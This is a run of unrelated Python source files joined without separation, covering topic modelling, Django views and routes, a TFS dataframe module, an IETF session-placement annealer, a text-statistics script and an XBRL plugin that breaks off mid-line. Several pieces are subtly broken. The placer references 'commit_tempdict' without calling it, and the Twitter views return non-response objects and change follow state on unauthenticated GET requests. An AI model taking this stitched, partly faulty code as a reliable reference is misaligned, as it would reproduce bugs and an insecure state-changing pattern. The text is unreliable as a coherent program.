ascending=False).iloc[0]['modelo'] melhor_coerencia = df_models.sort_values(by=['coerencia'], ascending=False).iloc[0]['coerencia'] num_topicos = df_models.sort_values(by=['coerencia'], ascending=False).iloc[0]['num_topics'] return self.melhor_modelo, melhor_coerencia, num_topicos def retornar_top_key_words(self, modelo, num_palavras=30): 
dict_palavras_topicos = {} for index, topic in modelo.show_topics(num_topics=-1,num_words=num_palavras,formatted=False): dict_words = {} for i, palavra in enumerate(topic,start=1): dict_words["palavra_{}".format(i)] = palavra[0] dict_words["prob_{}".format(i)] = float(palavra[1]) #print("Palavra: {} - Peso: {}".format(palavra[0],palavra[1])) dict_words["topico"] = index dict_palavras_topicos["topico_"+str(index)] = dict_words df_palavras = pd.DataFrame.from_dict(dict_palavras_topicos, orient='index') return df_palavras, dict_palavras_topicos def persistir_objeto_mongo(self, dict_dados): dict_dados['lista_coerencia'] = self.coherence_values dict_dados['palavras_melhor_modelo'] def processar_df_topicos_probabilidade(self, df): '''busca os 4 principais tópicos e salva em colunas''' df['topico_1'] = df.apply(lambda x: x['lista_topicos'][0][0] ,axis=1) df['prob_1'] = df.apply(lambda x: x['lista_topicos'][0][1] ,axis=1) try: df['topico_2'] = df.apply(lambda x: int(x['lista_topicos'][1][0]) if len(x['lista_topicos']) > 1 else None ,axis=1) df['prob_2'] = df.apply(lambda x: float(x['lista_topicos'][1][1]) if len(x['lista_topicos']) > 1 else None ,axis=1) except: df['topico_2'] = None df['prob_2'] = None try: df['topico_3'] = df.apply(lambda x: int(x['lista_topicos'][2][0]) if len(x['lista_topicos']) > 2 else None ,axis=1) df['prob_3'] = df.apply(lambda x: float(x['lista_topicos'][2][1]) if len(x['lista_topicos']) > 2 else None ,axis=1) except: df['topico_3'] = None df['prob_3'] = None try: df['topico_4'] = df.apply(lambda x: int(x['lista_topicos'][3][0]) if len(x['lista_topicos']) > 3 else None ,axis=1) df['prob_4'] = df.apply(lambda x: float(x['lista_topicos'][3][1]) if len(x['lista_topicos']) > 3 else None ,axis=1) except: df['topico_4'] = None df['prob_4'] = None return df# -*- coding: utf-8 -*- from django.urls import path from lgr_idn_table_review.idn_icann.views import IdnTableIcannModeView, IdnTableIcannListReports urlpatterns = [ path('', IdnTableIcannModeView.as_view(), name='lgr_idn_icann_mode'), path('report/<str:folder>', IdnTableIcannListReports.as_view(), name='lgr_idn_icann_reports'), ] from django.shortcuts import redirect, render from django.contrib.auth.decorators import login_required from .models import TwitterUser from django.template import RequestContext # Create your views here. @login_required def homepage(request): return render(request, 'index.html', {}) def user_detail(request, user_id): requested_user = TwitterUser.objects.get(id=user_id) return requested_user def following(request, user_id): user = TwitterUser.objects.get(id=user_id) following = len(user.following.all()) return following def follow(request, user_id): id = request.user.id editable = TwitterUser.objects.get(id=id) if request.method == 'GET': if request.user != user_id: editable.following.add(TwitterUser.objects.get(id=user_id)) editable.save() return render(request, 'index.html', {}) def unfollow(request, user_id): id = request.user.id editable = TwitterUser.objects.get(id=id) if request.method == 'GET': if request.user != user_id: editable.following.remove(TwitterUser.objects.get(id=user_id)) editable.save() return render(request, 'index.html', {}) """ Fixed Dataframe ----------------------- This classes allow you to pre-define your dataframes and only allow specific columns and headers. :Example: .. 
sourcecode:: python class KickTfs(FixedTfs): filename = "kick_{}.tfs" two_planes = True class Columns(FixedColumnCollection): NAME = FixedColumn("NAME", str) S = FixedColumn("S", float, "m") ALPHA = FixedColumn("ALF{}", float, "m") BETA = FixedColumn("BET{}", float, "m") class Headers(FixedColumnCollection): TITLE = FixedColumn("Title", str) TUNEX = FixedColumn("Q1", float) RESCALE = FixedColumn("RescaleFactor{}", float) Index = Columns.NAME kick_x = KickTfs(plane="X", directory="measurement_output") kick_x[kick_x.Columns.ALPHA] = calculate_alpha() # is equivalent to kick_x.ALFX = calculate_alpha() # the following will fail: kick_x["ALFY"] = calculate_alpha() # to write the file as kick_x.tfs into measurement_output: kick_x.write() # the class still has the old definitions stored KickTfs.Columns.ALPHA != kick_x.Columns.ALPHA # Getting a plane into the columns can be done at any level planed_columns = KickTfs.Columns("X") planed_columns.ALPHA == KickTfs.Columns.ALPHA("X") ``kick_x`` has now all columns defined, including their ``dtype``, which ensures successfull writing into a file. Otherwise ``kick_x`` will behave like a normal TfsDataFrame. The naming of the classes as ``Columns`` and ``Headers`` is important, as otherwise the definitions will not be found. Not including them will result in unrestricted DataFrames. :Issues: * If a lower-level function creating a new dataframe (e.g. ``append()`` or ``concat``) is called, the definitions might be lost. * Tricks can be used to temporarily create new columns and headers (e.g. writing to the headers object directly). It is in your hand to control for this once in a while by calling :meth:`FixedTfs.validate_definitions`. The dataframe is also checked before writing. """ import os from pathlib import Path from collections import defaultdict, OrderedDict, namedtuple from contextlib import suppress from typing import Union from tfs.handler import TfsDataFrame, read_tfs, write_tfs from tfs.tools import DotDict DEFAULTS = defaultdict(float, {int: 0, str: ""}) class FixedColumn(DotDict): """Class to define columns by name and dtype and possibly unit. The unit is not used internally so far, but might be useful for some applications. """ def __init__(self, name: str, dtype: type, unit: str = None): unit = "" if unit is None else unit super().__init__(dict(name=name, dtype=dtype, unit=unit)) def __str__(self): return self.name def __call__(self, plane): return FixedColumn(self.name.format(plane), self.dtype, self.unit) class FixedColumnCollection: """Abstract class to define TFS-Columns with name and Type. The columns are sorted into `names` and `types`, or as named-tuples in `columns`. 
Order of the properties is preserved since python 3.6 (see: https://stackoverflow.com/a/36060212/5609590 https://docs.python.org/3.6/whatsnew/3.6.html#whatsnew36-pep520 ) """ def __init__(self, plane: str = None, exclude: FixedColumn = None): type_and_unit = namedtuple("type_and_unit", ["dtype", "unit"]) self.plane = "" if plane is None else plane exclude = [] if exclude is None else exclude columns = [ col for col in type(self).__dict__.items() if isinstance(col[1], FixedColumn) and col[1] not in exclude ] self.mapping = OrderedDict() for attribute, column in columns: new_column = column(plane) setattr(self, attribute, new_column) # use same attributes but now 'planed' self.mapping[new_column.name] = type_and_unit( dtype=new_column.dtype, unit=new_column.unit ) self.names, (self.dtypes, self.units) = self.mapping.keys(), zip(*self.mapping.values()) def __iter__(self): return zip(self.names, self.dtypes, self.units) def __len__(self): return len(self.names) class FixedTfs(TfsDataFrame): """Abstract class to handle fixed TfsDataFrames. The final class needs to define filename, columns and headers. The instance directory and plane. """ filename = "" two_planes = True _initialized = False def __init__(self, plane: str = None, directory: Union[Path, str] = None, *args, **kwargs): super().__init__(*args, **kwargs) plane = "" if plane is None else plane directory = "" if directory is None else directory cls = type(self) self._directory = Path(directory) self._plane = plane if not cls.two_planes and len(plane): raise ValueError(f"{cls.__name__} is planeless, but a plane was defined.") self._filename = self._directory / cls.filename.format(plane) self.Columns = None with suppress(AttributeError, TypeError): self.Columns = cls.Columns(plane, exclude=[cls.Index]) self.Index = None with suppress(AttributeError, TypeError): self.Index = cls.Index(plane) self.Headers = None with suppress(AttributeError, TypeError): self.Headers = cls.Headers(plane) self._fill_missing_definitions() self.validate_definitions() self._initialized = True def __setitem__(self, key, value): try: return super().__setitem__(key, value) finally: if self._initialized and key in self.columns: for attribute in ("name", "dtype"): self._validate(attribute, "Columns", key) # Fill function -------------------- def _fill_missing_definitions(self): if self.Columns is not None: self._fill_missing_columns() if self.Headers is not None: self._fill_missing_headers() if self.Index is not None: self._fill_missing_index() # --- def _fill_missing_columns(self): for name, datatype, _ in self.Columns: if name not in self.columns: self[name] = DEFAULTS[datatype] self.reindex(self.Columns.names) self.astype({name: dtype for name, dtype, _ in self.Columns}, copy=False) def _fill_missing_headers(self): for name, datatype, _ in self.Headers: if name not in self.headers: self.headers[name] = DEFAULTS[datatype] new_headers = OrderedDict([(key, self.headers.pop(key)) for key in self.Headers.names]) new_headers.update(self.headers) # should be error, will raised in validation step! 
self.headers = new_headers def _fill_missing_index(self): self.index.name = self.Index.name self.index = self.index.astype(self.Index.dtype) # Validation -------------------- def _is_valid_name(self, kind, key) -> bool: if getattr(self, kind) is None: return True return key in getattr(self, kind).names def _is_valid_dtype(self, kind, key) -> bool: if getattr(self, kind) is None: return True check_type = getattr(self, kind).mapping[key].dtype try: dtype = self[key].dtype except AttributeError: return isinstance(self[key], check_type) if check_type == str and dtype == object: return True return dtype == check_type def _validate(self, attribute, kind, key=None): keys = getattr(self, kind.lower()) if key is None else [key] map_ = {"name": (self._is_valid_name, KeyError), "dtype": (self._is_valid_dtype, TypeError)} accepted, error = map_[attribute] invalid_name = [key for key in keys if not accepted(kind, key)] if len(invalid_name): raise error(f"Found invalid {kind} {attribute}s '{str(invalid_name)}'") def _validate_index_name(self): if self.Index is not None: if not self.index.name == self.Index.name: raise KeyError("Invalid index in DataFrame.") def _validate_index_type(self): if self.Index is not None and len(self.index) > 0: if not isinstance(self.index[0], self.Index.dtype): raise TypeError("Invalid index type in DataFrame.") def validate_definitions(self): """Validate the column, header and index present. """ for kind in ("Columns", "Headers"): for attribute in ("dtype", "name"): self._validate(attribute, kind) self._validate_index_name() self._validate_index_type() # IO Functions -------------------- def get_filename(self) -> Path: return self._filename def write(self) -> None: self.validate_definitions() write_tfs(self._filename, self, save_index=self.index.name) def read(self) -> "FixedTfs": return type(self)( self._plane, self._directory, read_tfs(self._filename, index=self.index.name) ) <filename>ietf/meeting/placement.py # FILE: ietf/meeting/placement.py # # Copyright (c) 2013, The IETF Trust. See ../../../LICENSE. # # This file contains a model that encapsulates the progress of the automatic placer. # Each step of placement is stored as a row in a table, not because this is necessary, # but because it helps to debug things. # # A production run of the placer would do the same work, but simply not save anything. # import sys from random import Random from datetime import datetime from django.db import models #from settings import BADNESS_UNPLACED, BADNESS_TOOSMALL_50, BADNESS_TOOSMALL_100, BADNESS_TOOBIG, BADNESS_MUCHTOOBIG #from ietf.meeting.models import Schedule, SchedTimeSessAssignment,TimeSlot,Room from ietf.meeting.models import SchedTimeSessAssignment from django.template.defaultfilters import slugify, date as date_format, time as time_format def do_prompt(): print "waiting:" sys.stdin.readline() class PlacementException(Exception): pass # ScheduleSlot really represents a single column of time. # The TimeSlot object would work here, but it associates a room. # There is a special Schedule slot (subclass) which corresponds to unscheduled items. class ScheduleSlot(object): def __init__(self, daytime): self.daytime = daytime self.badness = None self.slotgroups = {} # this is a partial copy of SchedTimeSessAssignment's methods. Prune later. 
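    # Added descriptive comment: scheduled_session_pk() below answers "which sessions would
    # occupy this time column if the swap currently under consideration (assignments.slot1 /
    # assignments.slot2) were applied", so recalc_badness() can score a proposed swap without
    # mutating any placement state.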
#def __unicode__(self): # return u"%s [%s<->%s]" % (self.schedule, self.session, self.timeslot) # #def __str__(self): # return self.__unicode__() def add_assignment(self,fs): self.slotgroups[fs] = fs def scheduled_session_pk(self, assignments): things = [] slot1 = assignments.slot1 slot2 = assignments.slot2 for fs in self.slotgroups.iterkeys(): session = fs.session if slot1 is not None and fs == slot1: session = slot2.session if slot2 is not None and fs == slot2: session = slot1.session if session is not None: things.append((session.pk,fs)) return things def recalc_badness1(self, assignments): badness = 0 for fs,fs2 in self.slotgroups.iteritems(): if fs.session is not None: num = fs.session.badness2(self) #print "rc,,,,%s,%s,%u,recalc1" % (self.daytime, fs.session.short_name, num) badness += num self.badness = badness def recalc_badness(self, assignments): badness = 0 session_pk_list = self.scheduled_session_pk(assignments) #print "rc,,,%u,slot_recalc" % (len(session_pk_list)) for pk,fs in session_pk_list: #print "rc,,,,%u,%s,list" % (pk,fs.session) if fs.session is not None: num = fs.session.badness_fast(fs.timeslot, self, session_pk_list) #print "rc,,,,%s,%s,%u,recalc0" % (self.daytime, fs.session.short_name, num) badness += num self.badness = badness def calc_badness(self, assignments): if self.badness is None: self.recalc_badness(assignments) return self.badness # # this subclass does everything a ScheduleSlot does, in particular it knows how to # maintain and recalculate badness, but it also maintains a list of slots which # are unplaced so as to accelerate finding things to place at the beginning of automatic placement. # # XXX perhaps this should be in the form an iterator? # class UnplacedScheduleSlot(ScheduleSlot): def __init__(self): super(UnplacedScheduleSlot, self).__init__(None) self.unplaced_slot_numbers = [] self.unplaced_slots_finishcount = 0 def shuffle(self, generator): generator.shuffle(self.unplaced_slot_numbers) self.unplaced_slots_finishcount = self.count / 10 def finished(self): if len(self.unplaced_slot_numbers) <= self.unplaced_slots_finishcount: return True else: return False @property def count(self): return len(self.unplaced_slot_numbers) def add_assignment(self,fs): super(UnplacedScheduleSlot, self).add_assignment(fs) #print "unplaced add: %s" % (fs.available_slot) self.unplaced_slot_numbers.append(fs.available_slot) def get_unplaced_slot_number(self): #print "unplaced slots: %s" % (self.unplaced_slot_numbers) return self.unplaced_slot_numbers[0] def delete_first(self): del self.unplaced_slot_numbers[0] class FakeSchedTimeSessAssignment(object): """ This model provides a fake (not-backed by database) N:M relationship between Session and TimeSlot, but in this case TimeSlot is always None, because the Session is not scheduled. """ faked = "fake" def __init__(self, schedule): self.extendedfrom = None self.modified = None self.notes = None self.badness = None self.available_slot = None self.origss = None self.timeslot = None self.session = None self.schedule = schedule self.pinned = False self.scheduleslot = None def fromSchedTimeSessAssignment(self, ss): # or from another FakeSchedTimeSessAssignment self.session = ss.session self.schedule = ss.schedule self.timeslot = ss.timeslot self.modified = ss.modified self.pinned = ss.pinned self.origss = ss def save(self): pass # this is a partial copy of SchedTimeSessAssignment's methods. Prune later. 
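    # Added descriptive comment: the properties that follow (room_name, acronym, area,
    # json_dict, ...) mirror the display API of the real SchedTimeSessAssignment model so
    # that agenda templates and JSON views can treat placed and unplaced sessions alike.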
def __unicode__(self): return u"%s [%s<->%s]" % (self.schedule, self.session, self.timeslot) def __str__(self): return self.__unicode__() @property def room_name(self): return "noroom" @property def special_agenda_note(self): return self.session.agenda_note if self.session else "" @property def acronym(self): if self.session and self.session.group: return self.session.group.acronym @property def slot_to_the_right(self): return None @property def acronym_name(self): if not self.session: return self.notes if hasattr(self, "interim"): return self.session.group.name + " (interim)" elif self.session.name: return self.session.name else: return self.session.group.name @property def session_name(self): return self.session.name @property def area(self): if not self.session or not self.session.group: return "" if self.session.group.type_id == "irtf": return "irtf" if self.timeslot.type_id == "plenary": return "1plenary" if not self.session.group.parent or not self.session.group.parent.type_id in ["area","irtf"]: return "" return self.session.group.parent.acronym @property def break_info(self): return None @property def area_name(self): if self.session and self.session.group and self.session.group.acronym == "edu": return "Training" elif not self.session or not self.session.group or not self.session.group.parent or not self.session.group.parent.type_id == "area": return "" return self.session.group.parent.name @property def isWG(self): if not self.session or not self.session.group: return False if self.session.group.type_id == "wg" and self.session.group.state_id != "bof": return True @property def group_type_str(self): if not self.session or not self.session.group: return "" if self.session.group and self.session.group.type_id == "wg": if self.session.group.state_id == "bof": return "BOF" else: return "WG" return "" @property def slottype(self): return "" @property def empty_str(self): # return JS happy value if self.session: return "False" else: return "True" def json_dict(self, selfurl): ss = dict() ss['assignment_id'] = self.id #ss['href'] = self.url(sitefqdn) ss['empty'] = self.empty_str ss['timeslot_id'] = self.timeslot.id if self.session: ss['session_id'] = self.session.id ss['room'] = slugify(self.timeslot.location) ss['roomtype'] = self.timeslot.type.slug ss["time"] = date_format(self.timeslot.time, 'Hi') ss["date"] = time_format(self.timeslot.time, 'Y-m-d') ss["domid"] = self.timeslot.js_identifier return ss # this object maintains the current state of the placement tool. # the assignments hash says where the sessions would go. class CurrentScheduleState: def __getitem__(self, key): if key in self.tempdict: return self.tempdict[key] return self.current_assignments[key] def __iter__(self): return self.current_assignments.__iter__() def iterkeys(self): return self.current_assignments.__iter__() def add_to_available_slot(self, fs): size = len(self.available_slots) if fs.session is not None: fs.session.setup_conflicts() time_column = None needs_to_be_added = True #print "adding fs for slot: %s" % (fs.timeslot) if fs.timeslot is not None: if fs.timeslot in self.fs_by_timeslot: ofs = self.fs_by_timeslot[fs.timeslot] #print " duplicate timeslot[%s], updating old one: %s" % (ofs.available_slot, fs.timeslot) if ofs.session is None: # keep the one with the assignment. 
self.fs_by_timeslot[fs.timeslot] = fs # get rid of old item fs.available_slot = ofs.available_slot self.available_slots[ofs.available_slot] = fs needs_to_be_added = False else: self.fs_by_timeslot[fs.timeslot] = fs # add the slot to the list of vertical slices. time_column = self.timeslots[fs.timeslot.time] #group_name = "empty" #if fs.session is not None: # group_name = fs.session.group.acronym #print " inserting fs %s / %s to slot: %s" % (fs.timeslot.location.name, # group_name, # time_column.daytime) fs.scheduleslot = time_column if fs.session is None: self.placed_scheduleslots.append(fs) else: time_column = self.unplaced_scheduledslots fs.scheduleslot = self.unplaced_scheduledslots if needs_to_be_added: self.total_slots = size self.available_slots.append(fs) fs.available_slot = size if time_column is not None: # needs available_slot to be filled in time_column.add_assignment(fs) #print "adding item: %u to unplaced slots (pinned: %s)" % (fs.available_slot, fs.pinned) def __init__(self, schedule, seed=None): # initialize available_slots with the places that a session can go based upon the # schedtimesessassignment objects of the provided schedule. # for each session which is not initially scheduled, also create a schedtimesessassignment # that has a session, but no timeslot. self.recordsteps = True self.debug_badness = False self.lastSaveTime = datetime.now() self.lastSaveStep = 0 self.verbose = False # this maps a *group* to a list of (session,location) pairs, using FakeSchedTimeSessAssignment self.current_assignments = {} self.tempdict = {} # used when calculating badness. # this contains an entry for each location, and each un-location in the form of # (session,location) with the appropriate part None. self.fs_by_timeslot = {} self.available_slots = [] self.unplaced_scheduledslots = UnplacedScheduleSlot() self.placed_scheduleslots = [] self.sessions = {} self.total_slots = 0 self.schedule = schedule self.meeting = schedule.meeting self.seed = seed self.badness = schedule.badness self.random_generator=Random() self.random_generator.seed(seed) self.temperature = 10000000 self.stepnum = 1 self.timeslots = {} self.slot1 = None self.slot2 = None # setup up array of timeslots objects for timeslot in schedule.meeting.timeslot_set.filter(type = "session").all(): if not timeslot.time in self.timeslots: self.timeslots[timeslot.time] = ScheduleSlot(timeslot.time) fs = FakeSchedTimeSessAssignment(self.schedule) fs.timeslot = timeslot self.add_to_available_slot(fs) self.timeslots[None] = self.unplaced_scheduledslots # make list of things that need placement. for sess in self.meeting.sessions_that_can_be_placed().all(): fs = FakeSchedTimeSessAssignment(self.schedule) fs.session = sess self.sessions[sess] = fs self.current_assignments[sess.group] = [] #print "Then had %u" % (self.total_slots) # now find slots that are not empty. # loop here and the one for useableslots could be merged into one loop allschedsessions = self.schedule.qs_assignments_with_sessions.filter(timeslot__type = "session").all() for ss in allschedsessions: # do not need to check for ss.session is not none, because filter above only returns those ones. 
sess = ss.session if not (sess in self.sessions): #print "Had to create sess for %s" % (sess) self.sessions[sess] = FakeSchedTimeSessAssignment(self.schedule) fs = self.sessions[sess] #print "Updating %s from %s(%s)" % (fs.session.group.acronym, ss.timeslot.location.name, ss.timeslot.time) fs.fromSchedTimeSessAssignment(ss) # if pinned, then do not consider it when selecting, but it needs to be in # current_assignments so that conflicts are calculated. if not ss.pinned: self.add_to_available_slot(fs) else: del self.sessions[sess] self.current_assignments[ss.session.group].append(fs) # XXX can not deal with a session in two slots yet?! # need to remove any sessions that might have gotten through above, but are in non-session # places, otherwise these could otherwise appear to be unplaced. allspecialsessions = self.schedule.qs_assignments_with_sessions.exclude(timeslot__type = "session").all() for ss in allspecialsessions: sess = ss.session if sess is None: continue if (sess in self.sessions): del self.sessions[sess] # now need to add entries for those sessions which are currently unscheduled (and yet not pinned) for sess,fs in self.sessions.iteritems(): if fs.timeslot is None: #print "Considering sess: %s, and loc: %s" % (sess, str(fs.timeslot)) self.add_to_available_slot(fs) #import pdb; pdb.set_trace() # do initial badness calculation for placement that has been done for daytime,scheduleslot in self.timeslots.iteritems(): scheduleslot.recalc_badness(self) def dump_available_slot_state(self): for fs in self.available_slots: shortname="unplaced" sessid = 0 if fs.session is not None: shortname=fs.session.short_name sessid = fs.session.id pinned = "unplaced" ssid=0 if fs.origss is not None: pinned = fs.origss.pinned ssid = fs.origss.id print "%s: %s[%u] pinned: %s ssid=%u" % (fs.available_slot, shortname, sessid, pinned, ssid) def pick_initial_slot(self): if self.unplaced_scheduledslots.finished(): self.initial_stage = False if self.initial_stage: item = self.unplaced_scheduledslots.get_unplaced_slot_number() slot1 = self.available_slots[item] #print "item: %u points to %s" % (item, slot1) else: slot1 = self.random_generator.choice(self.available_slots) return slot1 def pick_second_slot(self): if self.initial_stage and len(self.placed_scheduleslots)>0: self.random_generator.shuffle(self.placed_scheduleslots) slot2 = self.placed_scheduleslots[0] del self.placed_scheduleslots[0] else: slot2 = self.random_generator.choice(self.available_slots) return slot2 def pick_two_slots(self): slot1 = self.pick_initial_slot() slot2 = self.pick_second_slot() tries = 100 self.repicking = 0 # 1) no point in picking two slots which are the same. # 2) no point in picking two slots which have no session (already empty) # 3) no point in picking two slots which are both unscheduled sessions # 4) limit outselves to ten tries. while (slot1 == slot2 or slot1 is None or slot2 is None or (slot1.session is None and slot2.session is None) or (slot1.timeslot is None and slot2.timeslot is None) ) and tries > 0: self.repicking += 1 #print "%u: .. repicking slots, had: %s and %s" % (self.stepnum, slot1, slot2) slot1 = self.pick_initial_slot() slot2 = self.pick_second_slot() tries -= 1 if tries == 0: raise PlacementException("How can it pick the same slot ten times in a row") if slot1.pinned: raise PlacementException("Should never attempt to move pinned slot1") if slot2.pinned: raise PlacementException("Should never attempt to move pinned slot2") return slot1, slot2 # this assigns a session to a particular slot. 
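    # Added descriptive comment: assign_session() records the tentative group->assignment
    # lists in self.tempdict instead of current_assignments; __getitem__ above consults
    # tempdict first, so badness for a proposed swap is evaluated against the tentative
    # state, which is later either committed via commit_tempdict() or discarded when the
    # swap is rejected.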
def assign_session(self, session, fslot, doubleup=False): import copy if session is None: # we need to unschedule the session session = fslot.session self.tempdict[session.group] = [] return if not session in self.sessions: raise PlacementException("Is there a legit case where session is not in sessions here?") oldfs = self.sessions[session] # find the group mapping. pairs = copy.copy(self.current_assignments[session.group]) #print "pairs is: %s" % (pairs) if oldfs in pairs: which = pairs.index(oldfs) del pairs[which] #print "new pairs is: %s" % (pairs) self.sessions[session] = fslot # now fix up the other things. pairs.append(fslot) self.tempdict[session.group] = pairs def commit_tempdict(self): for key,value in self.tempdict.iteritems(): self.current_assignments[key] = value self.tempdict = dict() # calculate badness of the columns which have changed def calc_badness(self, slot1, slot2): badness = 0 for daytime,scheduleslot in self.timeslots.iteritems(): oldbadness = scheduleslot.badness if oldbadness is None: oldbadness = 0 recalc="" if slot1 is not None and slot1.scheduleslot == scheduleslot: recalc="recalc slot1" scheduleslot.recalc_badness(self) if slot2 is not None and slot2.scheduleslot == scheduleslot: recalc="recalc slot2" scheduleslot.recalc_badness(self) newbadness = scheduleslot.calc_badness(self) if self.debug_badness: print " calc: %s %u %u %s" % (scheduleslot.daytime, oldbadness, newbadness, recalc) badness += newbadness return badness def try_swap(self): badness = self.badness slot1,slot2 = self.pick_two_slots() if self.debug_badness: print "start\n slot1: %s.\n slot2: %s.\n badness: %s" % (slot1, slot2,badness) self.slot1 = slot1 self.slot2 = slot2 #import pdb; pdb.set_trace() #self.assign_session(slot2.session, slot1, False) #self.assign_session(slot1.session, slot2, False) # self can substitute for current_assignments thanks to getitem() above. 
newbadness = self.calc_badness(slot1, slot2) if self.debug_badness: print "end\n slot1: %s.\n slot2: %s.\n badness: %s" % (slot1, slot2, newbadness) return newbadness def log_step(self, accepted_str, change, dice, prob): acronym1 = "empty" if self.slot1.session is not None: acronym1 = self.slot1.session.group.acronym place1 = "nowhere" if self.slot1.timeslot is not None: place1 = str(self.slot1.timeslot.location.name) acronym2= "empty" if self.slot2.session is not None: acronym2 = self.slot2.session.group.acronym place2 = "nowhere" if self.slot2.timeslot is not None: place2 = str(self.slot2.timeslot.location.name) initial = " " if self.initial_stage: initial = "init" # note in logging: the swap has already occured, but the values were set before if self.verbose: print "% 5u:%s %s temp=%9u delta=%+9d badness=%10d dice=%.4f <=> prob=%.4f (repicking=%u) %9s:[%8s->%8s], %9s:[%8s->%8s]" % (self.stepnum, initial, accepted_str, self.temperature, change, self.badness, dice, prob, self.repicking, acronym1, place2, place1, acronym2, place1, place2) def do_step(self): self.stepnum += 1 newbadness = self.try_swap() if self.badness is None: self.commit_tempdict self.badness = newbadness return True, 0 change = newbadness - self.badness prob = self.calc_probability(change) dice = self.random_generator.random() #self.log_step("consider", change, dice, prob) if dice < prob: accepted_str = "accepted" accepted = True # swap things as planned self.commit_tempdict # actually do the swap in the FS tmp = self.slot1.session self.slot1.session = self.slot2.session self.slot2.session = tmp self.badness = newbadness # save state object else: accepted_str = "rejected" accepted = False self.tempdict = dict() self.log_step(accepted_str, change, dice, prob) if accepted and not self.initial_stage: self.temperature = self.temperature * 0.9995 return accepted, change def calc_probability(self, change): import math return 1/(1 + math.exp(float(change)/self.temperature)) def delete_available_slot(self, number): # because the numbers matter, we just None things out, and let repicking # work on things. #last = len(self.available_slots)-1 #if number < last: # self.available_slots[number] = self.available_slots[last] # self.available_slots[last].available_slot = number # #del self.available_slots[last] self.available_slots[number] = None def do_steps(self, limit=None, monitorSchedule=None): print "do_steps(%s,%s)" % (limit, monitorSchedule) if self.badness is None or self.badness == 0: self.badness = self.schedule.calc_badness1(self) self.oldbadness = self.badness while (limit is None or self.stepnum < limit) and self.temperature > 1000: accepted,change = self.do_step() #set_prompt_wait(True) if not accepted and self.initial_stage: # randomize again! self.unplaced_scheduledslots.shuffle(self.random_generator) if accepted and self.initial_stage and self.unplaced_scheduledslots.count>0: # delete it from available slots, so as not to leave unplaced slots self.delete_available_slot(self.slot1.available_slot) # remove initial slot from list. 
self.unplaced_scheduledslots.delete_first() if False and accepted and self.recordsteps: ass1 = AutomaticScheduleStep() ass1.schedule = self.schedule if self.slot1.session is not None: ass1.session = self.slot1.session if self.slot1.origss is not None: ass1.moved_to = self.slot1.origss ass1.stepnum = self.stepnum ass1.save() ass2 = AutomaticScheduleStep() ass2.schedule = self.schedule if self.slot2.session is not None: ass2.session = self.slot2.session if self.slot2.origss is not None: ass2.moved_to = self.slot2.origss ass2.stepnum = self.stepnum ass2.save() #print "%u: accepted: %s change %d temp: %d" % (self.stepnum, accepted, change, self.temperature) if (self.stepnum % 1000) == 0 and monitorSchedule is not None: self.saveToSchedule(monitorSchedule) print "Finished after %u steps, badness = %u->%u" % (self.stepnum, self.oldbadness, self.badness) def saveToSchedule(self, targetSchedule): when = datetime.now() since = 0 rate = 0 if targetSchedule is None: targetSchedule = self.schedule else: # XXX more stuff to do here, setup mapping, copy pinned items pass if self.lastSaveTime is not None: since = when - self.lastSaveTime if since.microseconds > 0: rate = 1000 * float(self.stepnum - self.lastSaveStep) / (1000*since.seconds + since.microseconds / 1000) print "%u: saved to schedule: %s %s elapsed=%s rate=%.2f" % (self.stepnum, targetSchedule.name, when, since, rate) self.lastSaveTime = datetime.now() self.lastSaveStep = self.stepnum # first, remove all assignments in the schedule. for ss in targetSchedule.assignments.all(): if ss.pinned: continue ss.delete() # then, add new items for new placements. for fs in self.available_slots: if fs is None: continue ss = SchedTimeSessAssignment(timeslot = fs.timeslot, schedule = targetSchedule, session = fs.session) ss.save() def do_placement(self, limit=None, targetSchedule=None): self.badness = self.schedule.calc_badness1(self) if limit is None: limitstr = "unlimited " else: limitstr = "%u" % (limit) print "Initial stage (limit=%s) starting with: %u items to place" % (limitstr, self.unplaced_scheduledslots.count) # permute the unplaced sessions self.unplaced_scheduledslots.shuffle(self.random_generator) self.initial_stage = True monitorSchedule = targetSchedule if monitorSchedule is None: monitorSchedule = self.schedule self.do_steps(limit, monitorSchedule) self.saveToSchedule(targetSchedule) # # this does not clearly have value at this point. # Not worth a migration/table yet. 
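# Illustrative sketch (not part of the original placer): do_step()/calc_probability() above
# implement a simulated-annealing style search -- a proposed swap is accepted with
# probability 1 / (1 + exp(delta_badness / temperature)) and the temperature is cooled
# geometrically on acceptance. A minimal standalone version of that accept/reject rule,
# assuming only a badness() callable and swap()/undo() hooks (hypothetical names), could
# look like this:
import math
import random


def anneal_step(state, temperature, cooling=0.9995, rng=random):
    """One accept/reject step of an annealing loop (illustration only)."""
    before = state.badness()
    state.swap()                              # propose a random exchange of two slots
    delta = state.badness() - before
    if rng.random() < 1.0 / (1.0 + math.exp(delta / temperature)):
        return True, temperature * cooling    # accept the swap and cool down
    state.undo()                              # reject: restore the previous assignment
    return False, temperature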
# if False: class AutomaticScheduleStep(models.Model): schedule = models.ForeignKey('Schedule', null=False, blank=False, help_text=u"Who made this agenda.") session = models.ForeignKey('Session', null=True, default=None, help_text=u"Scheduled session involved.") moved_from = models.ForeignKey('SchedTimeSessAssignment', related_name="+", null=True, default=None, help_text=u"Where session was.") moved_to = models.ForeignKey('SchedTimeSessAssignment', related_name="+", null=True, default=None, help_text=u"Where session went.") stepnum = models.IntegerField(default=0, blank=True, null=True) # -*- coding: utf-8 -*- #Based on txt file import re import string import nltk from nltk.tokenize import word_tokenize def num_ratio(path): #read in the test data line by line(list of each line) filename= path lineList = [line.rstrip('\n') for line in open(filename)] #calculate the empty rows in the list empty_row_ratio=sum(x is '' for x in lineList)/len(lineList) # remove punctuation stripped = [w.translate(str.maketrans('', '', string.punctuation)) for w in lineList] #split words separated_words = word_tokenize(' '.join(stripped)) #Distinguish numbers and calculte ratio num_ratio=len([x for x in separated_words if x.isdigit()])/len(separated_words) return empty_row_ratio,num_ratio num_ratio('Cumberland County (ME)_FY2013-pages-40.txt') <reponame>FedorSmirnov89/FunctionTemplate import json from .cloud_function import cloud_function # Wrapper for OpenFaaS def handle(event): req_json = json.loads(event) return cloud_function(req_json) from arelle import PluginManager from arelle.ModelValue import qname def setup(val): if 'http://fasb.org/us-gaap/2011-01-31' in val.modelXbrl.namespaceDocs: nsTbl = {None: 'http://fasb.org/us-gaap/2011-01-31', 'country' : 'http://xbrl.sec.gov/country/2011-01-31', 'currency': 'http://xbrl.sec.gov/currency/2011-01-31', 'dei': 'http://xbrl.sec.gov/dei/2011-01-31', 'exch': 'http://xbrl.sec.gov/exch/2011-01-31', 'invest': 'http://xbrl.sec.gov/invest/2011-01-31', 'naics': 